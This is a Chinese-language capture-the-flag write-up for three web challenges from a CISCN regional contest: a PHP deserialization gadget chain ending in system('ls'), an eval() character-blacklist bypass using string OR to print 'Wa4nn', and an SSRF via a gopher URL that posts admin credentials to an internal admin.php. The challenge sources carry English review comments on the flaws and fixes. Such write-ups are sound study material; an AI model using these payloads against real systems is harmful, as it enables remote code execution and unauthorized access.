CISCN华南赛区分区赛wp

期末考终于结束了,抓紧来整理一下这次比赛的wp

easy_seri

第一步先静态调试过

<?php
// Challenge entry point (easy_seri). All PHP errors/warnings are silenced, which also hides the
// "undefined variable" notices that the __wakeup() check below would otherwise emit.
error_reporting(0);
// Echoes this file's own source to the visitor, so the code under review is public by design.
highlight_file(__FILE__);
class Test{
// Both properties are public and default to null on a fresh instance.
public $public_key;
public $private_key;
// Runs automatically after unserialize() rebuilds a Test object.
// NOTE(review): the comparison reads the *local* variables $public_key / $private_key, not
// $this->public_key / $this->private_key. Both locals are undefined (null), so null !== null is
// false and die() never fires - the guard is a no-op regardless of the object's property values.
// The intended check would be: if($this->public_key !== $this->private_key)
function __wakeup(){
if($public_key !== $private_key)
{
die("You can't");
}
}
// Prints the raw contents of demo.php from the script's directory (the hint for the next stage).
function getHint()
{
echo file_get_contents('./demo.php');
}

}

// The serialized payload is read straight from the query string.
$a = $_GET['a'];
// Substring blacklist: rejects only payloads that contain the literal text 'key'. It does not
// restrict which classes unserialize() may instantiate, and (as the writeup notes) a serialized
// string in its escaped form does not contain that literal, so the check is not an effective control.
if(strpos($a,'key') !== false){
die("No!!!");
}
else
{
// unserialize() on attacker-controlled input, and the result is immediately invoked as a callable.
// Mitigation: do not unserialize untrusted data at all (use json_decode for data), or at minimum
// pass ['allowed_classes' => false] and never call the decoded value.
unserialize($a)();
}
?>
/?a=s:13:"Test::getHint"; gethint

看其他师傅的wp，也可以用16进制编码绕过strpos，再绕过__wakeup，然后用数组形式的callable执行getHint（因为unserialize后面还跟着一个调用括号）

// Payload generator for the challenge listing above (Test must be declared in scope - it is not
// part of this snippet). The property values are arbitrary here: as written, Test::__wakeup()
// compares two undefined locals rather than these properties, so nothing depends on them.
$test = new Test();
$test->public_key = 1;
$test->private_key = 2;
// An [object, 'method'] pair is itself a valid PHP callable, which is what the trailing ()
// after unserialize() in the target invokes.
$a = [$test, 'getHint'];
echo serialize($a);

然后可以看到demo.php

<?php
class Fake{
public $firm;
public $test;
// Magic setter: PHP calls this whenever code assigns to a property that Fake does not declare.
// $firm receives the property NAME being written and $test the value. The value is discarded and
// replaced by a fixed string; the name is then passed through unserialize() and the result is
// invoked with call_user_func(). A property name therefore becomes both a deserialization sink and
// a function-call sink - neither the unserialize() nor the call should operate on untrusted data.
public function __set($firm,$test){
$test = "No,You can't";
$firm = unserialize($firm);
call_user_func($firm,$test);
}
}
class Temp{
public $pri;
public $fin=1;
// Destructor: runs when the object is released, including objects produced by unserialize().
// NOTE(review): $this->action is not declared on Temp (a dynamic property, deprecated in PHP 8.2),
// so its value comes only from the serialized data. The write below sets a property whose name is
// $action on whatever object $pri holds; when $pri is a Fake and the name is not 'firm' or 'test',
// that write is routed into Fake::__set().
public function __destruct()
{
$a=$this->action;
$this->pri->$a = $this->fin;
}

}

class OwO{
public $fc;
public $args;
// Generic call gadget: invokes whatever $fc names, with $args as its single argument. Both
// properties are public, so any code path that unserializes this class hands full control of
// the call to the payload author.
function run()
{

return ($this->fc)($this->args);

}
}
// The 'poc' query parameter is deserialized with no class restriction, so every class in this
// file - with its __destruct/__set behaviour - is reachable from the request. Mitigation: treat
// the input as data (json_decode), or at least unserialize($d, ['allowed_classes' => false]).
$d = $_GET['poc'];
unserialize($d);
?>

反序列化

<?php

class Fake
{
public $firm;
public $test;

// Local copy of the target's Fake class. The class name and property layout must match the
// target exactly so that serialize() below emits what the target's unserialize() expects;
// the two echo lines are debugging output that exist only in this copy.
public function __set($firm, $test)
{
$test = "No,You can't";
$firm = unserialize($firm);
echo $firm;
echo $test;
call_user_func($firm, $test); //OwO run

}
}

class Temp
{
public $pri;
public $fin = 1;

// Local copy of the target's Temp class. $this->action is a dynamic property (set on the
// instance below, not declared here); serialize() includes dynamic properties, which is how
// it reaches the target's __destruct().
public function __destruct()
{
$a = $this->action;
$this->pri->$a = $this->fin;
}

}

class OwO
{
// Defaults apply only to instances created in this script; the inner serialized OwO string
// built below carries its own fc/args values.
public $fc = "system";
public $args = "id";

function run()
{
return ($this->fc)($this->args);
}
}

//$a=array(new OwO,'run');
//echo serialize($a);

// Chain as it unfolds on the target: Temp::__destruct -> write to an undeclared property of the
// Fake in $pri -> Fake::__set -> unserialize(property name) -> call_user_func([OwO, 'run'])
// -> OwO::run -> ($fc)($args). The inner payload travels as a plain string (the property name)
// and is only unserialized inside Fake::__set.
$a=new Temp;
$a->pri=new Fake;
$a->action='a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:2:"ls";}i:1;s:3:"run";}';
echo serialize($a)

?>

magicchar

<?php
// Silences all PHP diagnostics, including the preg_match() warning noted in Magic() below.
error_reporting(0);
// presumably flag.php defines $flag, which is echoed further down - file not shown, confirm.
include'flag.php';
// Input filter for the 'yell' parameter. Terminates the request (die) on the first byte outside
// printable ASCII 0x20..0x7E, then on the first blacklist pattern that matches; otherwise returns
// nothing and the caller proceeds to eval(). The exit after each die() is unreachable.
function Magic($str){
for($i=0; $i<=strlen($str)-1; $i++) {
if ((ord($str[$i])<32) or (ord($str[$i])>126)) {
die('sorry');
exit;
}
}
// Each entry is wrapped as '/' . $entry . '/m'. Observations a reviewer should flag:
// - '[A-VX-Za-z]' bans every letter except W, so W is the only letter that can appear literally.
// - '""' matches only two ADJACENT double quotes; a single " passes (the writeup's payload relies on this).
// - '\\' is a single backslash in single quotes, so the pattern becomes /\/m - the backslash escapes
//   the closing delimiter and preg_match() likely returns false (an error, silenced by
//   error_reporting(0)) rather than a match; verify, and check preg_last_error() after each call.
// A character blacklist in front of eval() is not a security boundary; the eval() itself is the defect.
$blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
foreach ($blklst as $blkitem) {
if (preg_match('/' . $blkitem . '/m', $str)) {
die('out');
exit;
}
}
}
// Without a 'yell' parameter the script just publishes its own source.
if(!isset($_GET['yell'])) {
show_source(__FILE__);
} else {
$str = $_GET['yell'];
Magic($str);
ob_start();
// User input is spliced directly into eval(); the only barrier is the blacklist in Magic().
// Whatever the evaluated expression echoes is captured from the output buffer and compared
// with the fixed string "Wa4nn" to decide whether $flag is revealed.
$res = eval("echo " . $str . ";");
$out = ob_get_contents();
ob_end_clean();
if ($out === "Wa4nn") {
echo $flag;
} else {
// Non-matching output is reflected back, HTML-escaped.
echo htmlspecialchars($out, ENT_QUOTES);
}
}
?>

套路题

字符串或

?yell=%22W%22.(%22@%22|%22!%22).%224%22.(%22@%22|%22.%22).(%22@%22|%22.%22)

really_admin

第一步根据提示直接md5过

admin/129581926211651571912466741651878684928

进来之后根据提示去ssrf.php

看到这个熟悉的界面，加上上方“慢慢做管理系统”的标题

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%201.png

破案了hfctf原题

直接翻出之前打hfctf的wp,直接打

http://172.35.16.17/ssrf.php?way=gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252056%250A%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250A

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%202.png

把返回的cookie保存下来，修改之后再访问flag.php

CISCN%E5%8D%8E%E5%8D%97%E8%B5%9B%E5%8C%BA%E5%88%86%E5%8C%BA%E8%B5%9Bwp%20f1f334862d914c13a0934a194b3ea0be/Untitled%203.png